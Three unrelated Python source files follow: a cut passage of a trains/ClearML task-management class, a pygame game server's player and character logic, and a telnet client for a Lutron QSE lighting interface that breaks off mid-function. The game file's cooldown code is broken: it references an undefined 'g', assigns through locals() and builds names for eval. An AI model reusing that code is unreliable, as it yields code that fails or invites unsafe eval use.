raise ValueError('Expected label to be a dict[str => int]')
execution.model_labels = enumeration
self._edit(execution=execution)
def _set_default_docker_image(self):
if not DOCKER_IMAGE_ENV_VAR.exists():
return
self.set_base_docker(DOCKER_IMAGE_ENV_VAR.get(default=""))
def set_base_docker(self, docker_cmd):
"""
Set the base docker image for this experiment
If provided, this value will be used by trains-agent to execute this experiment
inside the provided docker image.
"""
with self._edit_lock:
self.reload()
execution = self.data.execution
execution.docker_cmd = docker_cmd
self._edit(execution=execution)
def get_base_docker(self):
"""Get the base docker command (image) set for this experiment"""
return self._get_task_property('execution.docker_cmd', raise_on_error=False, log_on_error=False)
def set_artifacts(self, artifacts_list=None):
"""
List of artifacts (tasks.Artifact) to update the task
:param list artifacts_list: list of artifacts (type tasks.Artifact)
"""
if not Session.check_min_api_version('2.3'):
return False
if not (isinstance(artifacts_list, (list, tuple))
and all(isinstance(a, tasks.Artifact) for a in artifacts_list)):
raise ValueError('Expected artifacts to [tasks.Artifacts]')
with self._edit_lock:
self.reload()
execution = self.data.execution
keys = [a.key for a in artifacts_list]
execution.artifacts = [a for a in execution.artifacts or [] if a.key not in keys] + artifacts_list
self._edit(execution=execution)
def _set_model_design(self, design=None):
with self._edit_lock:
execution = self.data.execution
if design is not None:
execution.model_desc = Model._wrap_design(design)
self._edit(execution=execution)
def get_labels_enumeration(self):
"""
Return a dictionary of labels (text) to ids (integers) {str(label): integer(id)}
:return: dict
"""
if not self.data or not self.data.execution:
return {}
return self.data.execution.model_labels
def get_model_design(self):
"""
Returns the model configuration as blob of text
:return:
"""
design = self._get_task_property("execution.model_desc", default={}, raise_on_error=False, log_on_error=False)
return Model._unwrap_design(design)
def set_output_model_id(self, model_id):
self.data.output.model = str(model_id)
self._edit(output=self.data.output)
def get_random_seed(self):
# fixed seed for the time being
return 1337
def set_random_seed(self, random_seed):
# fixed seed for the time being
pass
def set_project(self, project_id):
assert isinstance(project_id, six.string_types)
self._set_task_property("project", project_id)
self._edit(project=project_id)
def get_project_name(self):
if self.project is None:
return None
if self._project_name and self._project_name[1] is not None and self._project_name[0] == self.project:
return self._project_name[1]
res = self.send(projects.GetByIdRequest(project=self.project), raise_on_errors=False)
if not res or not res.response or not res.response.project:
return None
self._project_name = (self.project, res.response.project.name)
return self._project_name[1]
def get_tags(self):
return self._get_task_property("tags")
def set_system_tags(self, tags):
assert isinstance(tags, (list, tuple))
if Session.check_min_api_version('2.3'):
self._set_task_property("system_tags", tags)
self._edit(system_tags=self.data.system_tags)
else:
self._set_task_property("tags", tags)
self._edit(tags=self.data.tags)
def set_tags(self, tags):
assert isinstance(tags, (list, tuple))
if not Session.check_min_api_version('2.3'):
# not supported
return
self._set_task_property("tags", tags)
self._edit(tags=self.data.tags)
def set_name(self, name):
"""
Set a comment text to the task.
:param name: The name of the task
:type name: str
"""
self._set_task_property("name", str(name))
self._edit(name=self.data.name)
def set_comment(self, comment):
"""
Set a comment text to the task.
:param comment: The comment of the task
:type comment: str
"""
self._set_task_property("comment", str(comment))
self._edit(comment=comment)
def _get_default_report_storage_uri(self):
if not self._files_server:
self._files_server = Session.get_files_server_host()
return self._files_server
@classmethod
def _get_api_server(cls):
return Session.get_api_server_host()
def _get_app_server(self):
if not self._app_server:
self._app_server = Session.get_app_server_host()
return self._app_server
def _edit(self, **kwargs):
with self._edit_lock:
# Since we ae using forced update, make sure he task status is valid
if not self._data or (str(self.data.status) not in (str(tasks.TaskStatusEnum.created),
str(tasks.TaskStatusEnum.in_progress))):
# the exception being name/comment that we can always change.
if kwargs and all(k in ('name', 'comment') for k in kwargs.keys()):
pass
else:
raise ValueError('Task object can only be updated if created or in_progress')
res = self.send(tasks.EditRequest(task=self.id, force=True, **kwargs), raise_on_errors=False)
return res
def _update_requirements(self, requirements):
if not isinstance(requirements, dict):
requirements = {'pip': requirements}
# protection, Old API might not support it
try:
self.data.script.requirements = requirements
self.send(tasks.SetRequirementsRequest(task=self.id, requirements=requirements))
except Exception:
pass
def _update_script(self, script):
self.data.script = script
self._edit(script=script)
@classmethod
def _clone_task(cls, cloned_task_id, name=None, comment=None, execution_overrides=None,
tags=None, parent=None, project=None, log=None, session=None):
"""
Clone a task
:param cloned_task_id: Task ID for the task to be cloned
:type cloned_task_id: str
:param name: New for the new task
:type name: str
:param comment: Optional comment for the new task
:type comment: str
:param execution_overrides: Task execution overrides. Applied over the cloned task's execution
section, useful for overriding values in the cloned task.
:type execution_overrides: dict
:param tags: Optional updated model tags
:type tags: [str]
:param parent: Optional parent Task ID of the new task.
:type parent: str
:param project: Optional project ID of the new task.
If None, the new task will inherit the cloned task's project.
:type project: str
:param log: Log object used by the infrastructure.
:type log: logging.Logger
:param session: Session object used for sending requests to the API
:type session: Session
:return: The new tasks's ID
"""
session = session if session else cls._get_default_session()
res = cls._send(session=session, log=log, req=tasks.GetByIdRequest(task=cloned_task_id))
task = res.response.task
output_dest = None
if task.output:
output_dest = task.output.destination
execution = task.execution.to_dict() if task.execution else {}
execution = ConfigTree.merge_configs(ConfigFactory.from_dict(execution),
ConfigFactory.from_dict(execution_overrides or {}))
# clear all artifacts
execution['artifacts'] = [e for e in execution['artifacts'] if e.get('mode') == 'input']
if not tags and task.tags:
tags = [t for t in task.tags if t != cls._development_tag]
req = tasks.CreateRequest(
name=name or task.name,
type=task.type,
input=task.input if hasattr(task, 'input') else {'view': {}},
tags=tags,
comment=comment or task.comment,
parent=parent,
project=project if project else task.project,
output_dest=output_dest,
execution=execution.as_plain_ordered_dict(),
script=task.script
)
res = cls._send(session=session, log=log, req=req)
cloned_task_id = res.response.id
if task.script and task.script.requirements:
cls._send(session=session, log=log, req=tasks.SetRequirementsRequest(
task=cloned_task_id, requirements=task.script.requirements))
return cloned_task_id
@classmethod
def get_all(cls, session=None, log=None, **kwargs):
"""
List all tasks based on specific projection
:param session: Session object used for sending requests to the API
:type session: Session
:param log: Log object
:type log: logging.Logger
:param kwargs: Keyword args passed to the GetAllRequest (see .backend_api.services.tasks.GetAllRequest)
Example: status='completed', 'search_text'='specific_word', 'user'='user_id', 'project'='project_id'
:type kwargs: dict
:return: API response
"""
session = session if session else cls._get_default_session()
req = tasks.GetAllRequest(**kwargs)
res = cls._send(session=session, req=req, log=log)
return res
@classmethod
def get_by_name(cls, task_name):
res = cls._send(cls._get_default_session(), tasks.GetAllRequest(name=exact_match_regex(task_name)))
task = get_single_result(entity='task', query=task_name, results=res.response.tasks)
return cls(task_id=task.id)
def _get_all_events(self, max_events=100):
"""
Get a list of all reported events.
Warning: Debug only. Do not use outside of testing.
:param max_events: The maximum events the function will return. Pass None
to return all the reported events.
:return: A list of events from the task.
"""
log_events = self.send(events.GetTaskEventsRequest(
task=self.id,
order='asc',
batch_size=max_events,
))
events_list = log_events.response.events
total_events = log_events.response.total
scroll = log_events.response.scroll_id
while len(events_list) < total_events and (max_events is None or len(events_list) < max_events):
log_events = self.send(events.GetTaskEventsRequest(
task=self.id,
order='asc',
batch_size=max_events,
scroll_id=scroll,
))
events_list.extend(log_events.response.events)
scroll = log_events.response.scroll_id
return events_list
|
Players.py
|
import sys
sys.path.append("C:/Users/David/Desktop/programacion/python/Anime Battle Online/server")
import threading
import pygame.image
from random import randint
import settings
import Globals
from functions.ShortFunctions import *
from classes.Bullet import Bullet
class Player():
def __init__(self, numero):
self.n = numero
self.addr = 0
self.ready = False
self.name = ""
self.character = 0
#CHARGING
#~ def tStartChargingAttack(self):
#~ self.chargingAttack = True
#~ while self.chargingAttack == True and self.chargingAttackDmgMultiplier < 5: #must be changed when the server receives stopChargingAttack
#~ if self.alive == True:
#~ self.chargingAttackDmgMultiplier += 0.2
#~ self.chargingAttackSizeMultiplier += 0.2
#~ self.chargingAttackSpeedMultiplier += 0.05
#~ pygame.time.wait(100)
#~ def stopChargingAttack(self, pos):
#~ self.chargingAttack = False
#~ self.shoot(pos, self.bulletDmg*self.chargingAttackDmgMultiplier, self.chargingAttackSizeMultiplier, self.chargingAttackSpeedMultiplier)
#~ self.chargingAttackDmgMultiplier = 1
#~ self.chargingAttackSizeMultiplier = 1
#~ self.chargingAttackSpeedMultiplier = 1
def reset(self): #resetea todos los valores a los valores iniciales
self.character.reset()
self.addr = 0
self.ready = False
self.name = ""
class character(): #clase character que es el personaje por defecto.
def __init__(self, nPlayer, n=1):
self.n = n
self.nPlayer = nPlayer
self.lastPos = [1,1]
self.Input = [0, 0]
self.direction = [0, 0]
self.points = 0
self.moving = False
image = pygame.image.load("graphics/pjs/" + str(self.n) + "/StillRight1.png")
self.imageSize = image.get_size()
self.rect = pygame.Rect(50,50,self.imageSize[0]*0.7, self.imageSize[1]*0.7) #la colision es un poco mas pequeña que la imagen real para hacerla mas ajustada
#self.lastUpdate = 16 #valor teorico que tendria que tener a 62.5fps: 1000 ms / 62.5 = 16 ms. este valor se cambia cada vez que el jugador se mueve para ajustarlo
self.initialBulletPos = ((self.rect.centerx + ((self.rect.width-20)*self.direction[0])), (self.rect.centery+20))
self.couldBeInsideWall = True
self.movementAvailable = True
self.speed = 0.25 #0.0625 0.125 0.25 0.5 1 estaba en 0.25
self.bulletSpeed = 0.75 #ESTABA EN 0.75
self.shootSpeed = 200 #miliseconds estaba en 200
self.bulletSizeMultiplier = 1
self.maxHp = 100
self.hp = self.maxHp
self.timeToRevive = 5000 #miliseconds
self.alive = True
self.bulletDmg = 5
self.lastTimeShot = 0
self.chargingAttack = False
self.chargingAttackDmgMultiplier = 1
self.chargingAttackSizeMultiplier = 1
self.chargingAttackSpeedMultiplier = 1
self.balas = []
self.playerVarsBeenChanging = [] #la estructura sera [[VAR, CHANGEBY], [VAR, CHANGEBY], ...]
self.cd2 = 26 #la ulti tiene 26 segundos de cd
self.actualCd2 = 0 #al principio la ulti no esta en cd
def shoot(self, posToShoot, dmg, sizeMultiplier=1, speedMultiplier=1, nImagen=0):
if sizeMultiplier == 1: #por defecto esta variable es 1, si se le pasa un valor se establece ese valor
sizeMultiplier = self.bulletSizeMultiplier #y si no se establece ninguno, adquiere el valor de self.bulletSizeMultiplier
if not nImagen:
nImagen = self.n
if self.alive == True and self.chargingAttack == False:
time = pygame.time.get_ticks()
if time - self.lastTimeShot >= self.shootSpeed: #ENTONCES DISPARA
vector = pygame.math.Vector2(posToShoot[0] - self.initialBulletPos[0], posToShoot[1] - self.initialBulletPos[1])
if vector.length() != 0:
vector.scale_to_length(self.bulletSpeed*speedMultiplier)
else:
return
angle = vector.angle_to((1,0))
#print("Vector:", vector, ". Angle:", angle)
n=1
result = getBulletByNumber(n, self)
if result: #si la bala uno existe
while result:
n+=1 #va sumando 1 hasta que la bala n no exista para crearla.
result = getBulletByNumber(n, self)
sendDataToAllPlayers(packPacket(["newBullet", self.nPlayer, sizeMultiplier, angle, nImagen, self.initialBulletPos[0], self.initialBulletPos[1]]))
locals()["bala" + str(n)] = Bullet(n, self.nPlayer, self.initialBulletPos, vector, dmg, sizeMultiplier, nImagen)
self.balas.append(eval("bala" + str(n)))
self.lastTimeShot = time
def calcPos(self, MurosRects):
#print(self.rect.centerx, self.rect.centery)
if self.couldBeInsideWall:
while self.rect.collidelist(MurosRects) != -1:
self.rect.centerx, self.rect.centery = randint(int(self.rect.width/2), int(settings.CLIENT_SCREEN_SIZE[0]-(self.rect.width/2))) , randint(int(1+self.rect.height/2), int(settings.CLIENT_SCREEN_SIZE[1]-(self.rect.height/2)))
self.couldBeInsideWall = False
if self.alive == True and self.movementAvailable == True:
possiblePos = [0,0]
possiblePos[0] = self.rect.centerx + (self.Input[0] * self.speed * 16) #LASTUPDATE
possiblePos[1] = self.rect.centery + (self.Input[1] * self.speed * 16) #16 es el numero de milisegundos entre cada fps cuando va a ~60fps
possibleRectx, possibleRecty = self.rect.copy(), self.rect.copy()
possibleRectx.centerx = possiblePos[0]
possibleRecty.centery = possiblePos[1]
if possiblePos[0] > (self.rect.width/2) and possiblePos[0] < (settings.CLIENT_SCREEN_SIZE[0]-(self.rect.width/2)): #analiza si se sale de la pantalla
if possibleRectx.collidelist(MurosRects) == -1: #si no colisiona con algun muro se cambia la posicion
self.rect.centerx = possiblePos[0]
if possiblePos[1] > (self.rect.height/2) and possiblePos[1] < (settings.CLIENT_SCREEN_SIZE[1]-(self.rect.height/2)):
if possibleRecty.collidelist(MurosRects) == -1:
self.rect.centery = possiblePos[1]
if self.rect.centerx - self.lastPos[0] != 0: #si se ha movido, calcula la direccion (1 o -1)
self.direction[0] = (self.rect.centerx - self.lastPos[0])/abs(self.rect.centerx - self.lastPos[0])
if self.rect.centery - self.lastPos[1] != 0:
self.direction[1] = (self.rect.centery - self.lastPos[1])/abs(self.rect.centery - self.lastPos[1])
self.initialBulletPos = ((self.rect.centerx + ((self.rect.width-20)*self.direction[0])), (self.rect.centery+20)) #calcula la posicion inicial de donde saldrian las balas
#print(self.playerVarsBeenChanging)
def checkIfCollidingWithPlayers(self):
colisionIndexList = self.rect.collidelistall(Globals.JugadoresEncontradosRects)
return colisionIndexList
#if colision != -
#print("Jugador " + str(self.n) + " colisiona.")
#pass
def decreaseHp(self,n, characterQueHaceDaño):
self.hp -= n
if self.hp > 0:
sendDataToAllPlayers(packPacket(["changeHp", self.nPlayer, self.hp]))
elif self.hp <= 0: #MUERTE--------------
if self.alive == True:
self.die()
characterQueHaceDaño.points += 1
def die(self):
sendDataToAllPlayers(packPacket(["state", self.nPlayer, "dead"]))
sendDataToAllPlayers(packPacket(["changeHp", self.nPlayer, 0]))
self.alive = False
self.movementAvailable = False
#~ self.chargingAttackDmgMultiplier = 1 #CHARGING
#~ self.chargingAttackSizeMultiplier = 1
Globals.JugadoresEncontradosRects.remove(self.rect)
threadToRevive = threading.Thread(target=self.tRevive, name="self.tRevive", daemon=True)
threadToRevive.start()
def tRevive(self):
pygame.time.wait(self.timeToRevive)
if Globals.JugadoresEncontrados.count(getPlayerByNumber(self.nPlayer)):
self.alive = True
self.movementAvailable = True
self.hp = self.maxHp
sendDataToAllPlayers(packPacket(["state", self.nPlayer, "normal"]))
sendDataToAllPlayers(packPacket(["changeHp", self.nPlayer, self.maxHp]))
Globals.JugadoresEncontradosRects.append(self.rect)
self.rect.centerx, self.rect.centery = randint(int(self.rect.width/2), int(settings.CLIENT_SCREEN_SIZE[0]-(self.rect.width/2))) , randint(int(1+self.rect.height/2), int(settings.CLIENT_SCREEN_SIZE[1]-(self.rect.height/2)))
self.couldBeInsideWall = True
def reset(self): #resetea todos los valores a los valores iniciales
self.rect.centerx, self.rect.centery = 50,50
self.lastPos = [1,1]
self.hp = self.maxHp
self.alive = True
self.speed = 0.25 #0.0625 0.125 0.25 0.5 1 estaba en 0.25
self.bulletSpeed = 0.75 #ESTABA EN 0.75
self.shootSpeed = 200 #miliseconds estaba en 200
self.maxHp = 100
self.hp = self.maxHp
self.timeToRevive = 3000 #miliseconds
self.bulletDmg = 5
self.actualCdUlti = 0
self.movementAvailable = True
if self.playerVarsBeenChanging: #si el jugador cogio una mejora y se desconectó, el thread que volverá el valor a la normalidad seguirá activo esperando
#este thread mete la variable que esta cambiando y el valor que le está sumando dentro de self.playerVarsBeenChanging, y la remueve despues de resetear la variable del jugador
#cada uno de los elementos de playerVarsBeenChanging es [VAR, CHANGEBY]
#sin embargo, el valor ya está reseteado ya que se ha desconectado, por lo que tengo que volver a subir el valor para que el thread lo baje y quede reseteado.
for elemento in self.playerVarsBeenChanging:
setattr(self, elemento[0], getattr(self, elemento[0]) + elemento[1]) #cambio el atributo del objeto player que hay en la variable playerVar
def tCdSkill(self, nSkill, cdToWait, cdsToSendToClient):
argsPacket = ["cd", nSkill]
for cdToSendToClient in cdsToSendToClient:
argsPacket.append(cdToSendToClient)
sendDataToPlayer(packPacket(argsPacket), getPlayerByNumber(self.nPlayer))
locals()["self.actualCd" + str(nSkill)] = cdToWait #esto es complejo. eval se usa para obtener el valor dentro de la variable del nombre que le pases
#y globals() se usa para llamar a la variable de ese nombre
actualCdSkill = eval("self.actualCd" + str(nSkill))
while actualCdSkill > 0:
pygame.time.wait(100)
g["self.actualCd" + str(nSkill)] -= 0.1
def tDefaultBuffSkill(self, varsAndChangebysList, timeMiliseconds): #[[value, changeby][value, changeby]]
for varAndChangeby in varsAndChangebysList:
setattr(self, varAndChangeby[0], getattr(self, varAndChangeby[0]) + varAndChangeby[1])
self.playerVarsBeenChanging.append([varAndChangeby[0], varAndChangeby[1]])
sendDataToAllPlayers(packPacket(["state", self.nPlayer, "buffed"]))
pygame.time.wait(round(timeMiliseconds))
sendDataToAllPlayers(packPacket(["state", self.nPlayer, "normal"]))
for varAndChangeby in varsAndChangebysList:
setattr(self, varAndChangeby[0], getattr(self, varAndChangeby[0]) - varAndChangeby[1])
self.playerVarsBeenChanging.remove([varAndChangeby[0], varAndChangeby[1]])
def tChangeVarForTime(self, var, newValue, timeMiliseconds):
oldValue = getattr(self, var)
setattr(self, var, newValue)
self.playerVarsBeenChanging.append([var, newValue-oldValue])
pygame.time.wait(round(timeMiliseconds))
setattr(self, var, oldValue)
self.playerVarsBeenChanging.remove([var, newValue-oldValue])
class charNaruto(character):
def __init__(self, nPlayer):
super().__init__(nPlayer, 1)
def tSkill1(self, mousePos):
pass
def tSkill2(self, mousePos):
#self.shoot(self, pos, dmg, sizeMultiplier=0, speedMultiplier=1, nImagen=0)
if self.actualCd2 <= 0:
#~ if self.direction[0] == 1:
#~ sendDataToAllPlayers(packPacket(["animation", self.nPlayer, "ChargeRasenganRight"]))
#~ elif self.direction[0] == -1:
#~ sendDataToAllPlayers(packPacket(["animation", self.nPlayer, "ChargeRasenganLeft"]))
sendDataToAllPlayers(packPacket(["state", self.nPlayer, "chargingAttack"]))
threadCdUlti = threading.Thread(target=self.tCdSkill, args=(2, self.cd2, [self.cd2]), name="self.tCdSkill", daemon=True)
threadCdUlti.start()
self.tChangeVarForTime("movementAvailable", False, 500) #no es necesario hacer un thread, ya que simplemente podemos esperar
sendDataToAllPlayers(packPacket(["state", self.nPlayer, "normal"]))
self.lastTimeShot = pygame.time.get_ticks() - self.shootSpeed #se hace para que este listo para disparar
self.shoot(mousePos, self.bulletDmg*15, 1, 2, "1_ulti")
class charHinata(character):
def __init__(self, nPlayer):
super().__init__(nPlayer, 2)
self.timeSkill2 = 4.5
def tSkill1(self, mousePos):
pass
def tSkill2(self, mousePos):
if self.actualCd2 <= 0:
shootSpeedChangeValue = -150
bulletSpeedChangeValue = 0.75
varsAndChangebysList = [["shootSpeed", shootSpeedChangeValue],["bulletSpeed", bulletSpeedChangeValue]]
threadCdUlti = threading.Thread(target=self.tCdSkill, args=(2, self.cd2, [self.timeSkill2, self.cd2 - self.timeSkill2]), name="self.tCdSkill", daemon=True)
threadCdUlti.start()
self.tDefaultBuffSkill(varsAndChangebysList, self.timeSkill2*1000)
#~ threadBuffUlti = threading.Thread(target=self.tDefaultBuffSkill, args=(varsAndChangebysList, self.timeSkill2*1000))
#~ threadBuffUlti.setDaemon = True
#~ threadBuffUlti.start()
class charSaitama(character):
def __init__(self, nPlayer):
super().__init__(nPlayer, 3)
def tSkill1(self, mousePos):
pass
def tSkill2(self, mousePos):
if self.actualCd2 <= 0:
threadCdUlti = threading.Thread(target=self.tCdSkill, args=(2, self.cd2, [self.cd2]), name="self.tCdSkill", daemon=True)
threadCdUlti.start()
colisionIndexList = self.checkIfCollidingWithPlayers()
for colisionIndex in reversed(colisionIndexList): #se hace en reverse porque cuando un jugador muere se quita de esa lista,
#de manera que el que esta en la pos 2 pasaria a estar en la pos 1
#getPlayerByNumber(colisionIndex+1).character.decreaseHp(100) solo funciona cuando no se ha salido ningun personaje
playerColisionado = getPlayerByRect(Globals.JugadoresEncontradosRects[colisionIndex])
if playerColisionado.character.rect != self.rect:
sendDataToAllPlayers(packPacket(["state", self.nPlayer, "chargingAttack"]))
threadInmovilizar = threading.Thread(target=self.tChangeVarForTime, args=("movementAvailable", False, 500), name="self.tChangeVarForTime", daemon=True)
threadInmovilizar.start()
playerColisionado.character.tChangeVarForTime("movementAvailable", False, 500)#es necesario hacer un thread, porque hay que cambiar dos vars
playerColisionado.character.decreaseHp(100, self)
sendDataToAllPlayers(packPacket(["state", self.nPlayer, "normal"]))
class charDeku(character):
def __init__(self, nPlayer):
super().__init__(nPlayer, 4)
self.timeSkill2 = 4.5
def tSkill1(self, mousePos):
pass
def tSkill2(self, mousePos):
if self.actualCd2 <= 0:
dmgChangeValue = 30
bulletSizeMultiplierChangeValue = 0.5
shootSpeedChangeValue = 300
speedChangeValue = 0.25
varsAndChangebysList = [["bulletDmg", dmgChangeValue],["bulletSizeMultiplier", bulletSizeMultiplierChangeValue], ["shootSpeed", shootSpeedChangeValue], ["speed", speedChangeValue]]
threadBuffUlti = threading.Thread(target=self.tDefaultBuffSkill, args=(varsAndChangebysList, self.timeSkill2*1000), name="self.tDefaultBuffSkill", daemon=True)#[[value, changeby][value, changeby]]
threadBuffUlti.start()
threadCdUlti = threading.Thread(target=self.tCdSkill, args=(2, self.cd2, [self.timeSkill2, self.cd2 - self.timeSkill2]), name="self.tCdSkill", daemon=True)
threadCdUlti.start()
class charSora(character):
def __init__(self, nPlayer):
super().__init__(nPlayer, 5)
def tSkill1(self, mousePos):
pass
def tSkill2(self, mousePos):
if self.actualCd2 <= 0:
puntos = getPuntosPerimetroCuadrado(2) #obtiene los puntos de un cuadrado con una distancia al centro de 2
#para mas informacion, ver la funcion
for punto in puntos:
self.shoot((self.initialBulletPos[0] + punto[0], self.initialBulletPos[1] + punto[1]), self.bulletDmg)
self.lastTimeShot = pygame.time.get_ticks() - self.shootSpeed #se hace para que este listo para disparar
threadCdUlti = threading.Thread(target=self.tCdSkill, args=(2, self.cd2, [self.cd2]), name="self.tCdSkill", daemon=True)
threadCdUlti.start()
#print(self.balas)
|
qse.py
|
"""API for Lutron QSE network interface (QSE-CI-NWK-E)."""
import datetime
import logging
import socket
import telnetlib
import time
from threading import Thread, Lock
from typing import List
from pylutron_qse.devices import (ALL_STATES, Device, Roller)
_LOG = logging.getLogger('qse')
_LOG.setLevel(logging.DEBUG)
# Timeout and retry contants.
_TIMEOUT = 3
_LOGIN_ATTEMPT_INTERVAL = datetime.timedelta(seconds=60)
_DEVICE_DISCOVERY_INTERVAL = datetime.timedelta(seconds=10 * 60)
_MONITOR_INTERVAL = datetime.timedelta(milliseconds=50)
# Misc QSE strings.
_DELIMITER = b','
_DEFAULT_COMPONENT = b'0'
_DEFAULT_USERNAME = 'nwk'
_EOL = b'\r\n'
_ID_ALL_DEVICES = b'ALL_DEVICES'
_LOGIN_PROMPT = b'login: '
_LOGIN_SUCCESS = b'connection established' + _EOL
_PROMPT = b'QSE>'
# Operations
_OP_COMMAND = b'#'
_OP_REQUEST = b'?'
_OP_RESPONSE = b'~'
# Commands
_CMD_DETAILS = b'DETAILS'
_CMD_DEVICE = b'DEVICE'
# Details request/response strings
_DETAILS_INTEGRATION_ID = b'INTEGRATIONID:'
_DETAILS_INTEGRATION_ID_NOT_SET = b'(Not Set)'
_DETAILS_PRODUCT = b'PRODUCT:'
_DETAILS_PRODUCT_ROLLERS = [b'ROLLER(1)']
_DETAILS_SERIAL_NUMBER = b'SN:'
def _command_from_parts(cmd_parts):
return _DELIMITER.join(cmd_parts) + _EOL
class QSE(object):
"""
Lutron QSE network interface (QSE-CI-NWK-E).
See Lutron integration protocol (search: "QS Standalone"):
http://www.lutron.com/TechnicalDocumentLibrary/040249.pdf
"""
def __init__(self, hostname=None, username=_DEFAULT_USERNAME):
"""Consructor for QSE."""
self._hostname = hostname
self._username = username
self._telnet = None
self._telnet_lock = Lock()
self._devices = {}
self._last_login_attempt = None
self._last_device_discovery = None
# Initial login and device discovery.
self._telnet = self._lock_and_do(self._login)
self._lock_and_do_if_connected(self._load_devices)
# Start background monitoring thread.
monitor = Thread(target=self._monitor)
monitor.setDaemon(True)
monitor.start()
def connected(self) -> bool:
"""Return True if connection to QSE is active."""
return self._telnet is not None
def devices(self) -> List[Device]:
"""Return all devices."""
return self._devices.values()
def rollers(self) -> List[Roller]:
"""Return all roller devices."""
return [r for r in self._devices.values() if isinstance(r, Roller)]
def _lock_and_do_if_connected(self, callback, *args):
return self._lock_and_do(callback, True, *args)
def _lock_and_do(self, callback, test_connected=False, *args):
self._telnet_lock.acquire()
if test_connected and not self._telnet:
self._telnet_lock.release()
return
result = callback(*args)
self._telnet_lock.release()
return result
def _login(self):
"""Open connection to telnet."""
self._last_login_attempt = datetime.datetime.now()
_LOG.debug('Logging in to Lutron QSE')
try:
telnet = telnetlib.Telnet(self._hostname, timeout=_TIMEOUT)
response = telnet.read_until(_LOGIN_PROMPT, timeout=_TIMEOUT)
assert response == _LOGIN_PROMPT, response
telnet.write(bytes(self._username, encoding='ascii') + _EOL)
response = telnet.read_until(_LOGIN_SUCCESS, timeout=_TIMEOUT)
assert response == _LOGIN_SUCCESS, response
except (socket.error, socket.gaierror, socket.timeout, EOFError):
_LOG.error('Failed to connect to Lutron QSE.'
'Retry in %d seconds.', _LOGIN_ATTEMPT_INTERVAL)
return None
_LOG.info("Logged in to Lutron QSE")
return telnet
def _close(self):
"""Close connection to telnet."""
_LOG.debug("Closing connection to Lutron QSE")
self._telnet.close()
self._telnet = None
_LOG.info("Connection to Lutron QSE closed")
def _load_devices(self):
"""Load all devices."""
self._last_device_discovery = datetime.datetime.now()
# Details query to initialize all devices.
result = self._exec(_command_from_parts(
[_OP_REQUEST + _CMD_DETAILS, _ID_ALL_DEVICES]))
for response in result:
assert isinstance(response, list), response
assert response, response
self._init_device(response)
# Query all device states.
for state in ALL_STATES:
result = self._exec(_command_from_parts(
[_OP_REQUEST + _CMD_DEVICE, _ID_ALL_DEVICES,
_DEFAULT_COMPONENT, state]))
for response in result:
assert isinstance(response, list), response
assert response, response
if response[0] != _OP_RESPONSE + _CMD_DEVICE:
_LOG.warning(
'Ignoring unexpected response: ' + str(response))
continue
self._route_device_response(response)
def _monitor(self):
_LOG.debug('Entering background monitoring thread.')
while True:
now = datetime.datetime.now()
# Try login if we are not connected.
if not self._telnet:
next_login = self._last_login_attempt + _LOGIN_ATTEMPT_INTERVAL
if now < next_login:
time.sleep((next_login - now).total_seconds())
continue
else:
self._telnet = self._lock_and_do(self._login)
# Discover devices.
if now > self._last_device_discovery + _DEVICE_DISCOVERY_INTERVAL:
self._lock_and_do_if_connected(self._load_devices)
# Read events.
self._lock_and_do_if_connected(self._read_events)
time.sleep(float(_MONITOR_INTERVAL.microseconds) / 1e6)
_LOG.debug('Exiting background monitoring thread.')
def _read_events(self):
"""Read events."""
result = self._read_if_available()
for response in result:
assert isinstance(response, list), response
assert response, response
if response[0] == _OP_RESPONSE + _CMD_DEVICE:
self._route_device_response(response)
def _init_device(self, response):
if not response or response[0] != _OP_RESPONSE + _CMD_DETAILS:
_LOG.warning('Ignoring unexpected response: ' + str(response))
return
assert len(response) >= 5, response
assert response[1].startswith(_DETAILS_SERIAL_NUMBER), response
assert response[2].startswith(_DETAILS_INTEGRATION_ID), response
assert response[4].startswith(_DETAILS_PRODUCT), response
serial_number = response[1][len(_DETAILS_SERIAL_NUMBER):]
integration_id = response[2][len(_DETAILS_INTEGRATION_ID):]
product = response[4][len(_DETAILS_PRODUCT):]
if serial_number in self._devices:
return
if integration_id == _DETAILS_INTEGRATION_ID_NOT_SET:
integration_id = None
if product in _DETAILS_PRODUCT_ROLLERS:
device = Roller(self, serial_number, integration_id)
else:
device = Device(self, serial_number, integration_id)
assert device
self._devices[serial_number] = device
def _route_device_response(self, response):
assert len(response) >= 2, response
assert response[0] == _OP_RESPONSE + _CMD_DEVICE, response
id_or_sn = response[1]
if id_or_sn in self._devices:
# Serial number
# pylint: disable=protected-access
self._devices[id_or_sn]._handle_response(response)
return
else:
# Integration id
id_string = id_or_sn.decode('ascii')
devices_with_id = [d for d in self._devices.values()
if d.integration_id == id_string]
if devices_with_id:
assert len(devices_with_id) == 1
# pylint: disable=protected-access
devices_with_id[0]._handle_response(response)
return
_LOG.debug('Event for unknown device: ' + str(response))
def _make_device_request(self, serial_number, action, value=None):
"""Change the state of a device."""
cmd_parts = [_OP_COMMAND + _CMD_DEVICE,
serial_number, _DEFAULT_COMPONENT, action]
if value:
cmd_parts.append(value)
cmd = _command_from_parts(cmd_parts)
result = self._lock_and_do_if_connected(self._exec, cmd)
for response in result:
assert isinstance(response, list), response
assert response, response
if response[0] == _OP_RESPONSE + _CMD_DEVICE:
self._route_device_response(response)
def _exec(self, cmd):
"""Issue a command and parse the response.
Caller must hold _telnet_lock.
"""
self._flush()
if not self._telnet:
return []
self._write(cmd)
if not self._telnet:
return []
result = self._read_until_prompt()
return result
def _flush(self):
"""Flush unread data.
Caller must hold _telnet_lock.
"""
try:
while True:
data = self._telnet.read_eager()
if not data:
break
except (socket.error, EOFError):
_LOG.error('Connection to Lutron QSE lost.')
self._close()
def _write(self, data):
"""Write data to telnet.
Caller must hold _telnet_lock.
"""
try:
self._telnet.write(data)
except (socket.error, EOFError):
_LOG.error('Connection to Lutron QSE lost.')
self._close()
return
except socket.timeout:
_LOG.error('Timeout while attempting to write to Lutron QSE.')
return
_LOG.debug('Wrote: ' + str(data))
def _read_until_prompt(self, initial_data=None):
"""Read until we encounter a prompt and no additional data available.
Blocks until data is available (or timeout expires).
Caller must hold _telnet_lock.
"""
data = bytearray(initial_data) if initial_data else bytearray()
try:
# Read until we encounter a prompt and no additional data.
while not data.endswith(_PROMPT):
data.extend(self._telnet.read_until(_PROMPT, timeout=_TIMEOUT))
data.extend(self._telnet.read_eager())
if not data:
break
except (socket.error, EOFError):
_LOG.error('Connection to Lutron QSE lost')
self._close()
return []
except socket.timeout:
pass
# Parse the data into responses and comma-delimined chunks.
result = []
responses = data.split(_EOL)
for response in responses:
response = response.replace(_PROMPT, b'')
if not response:
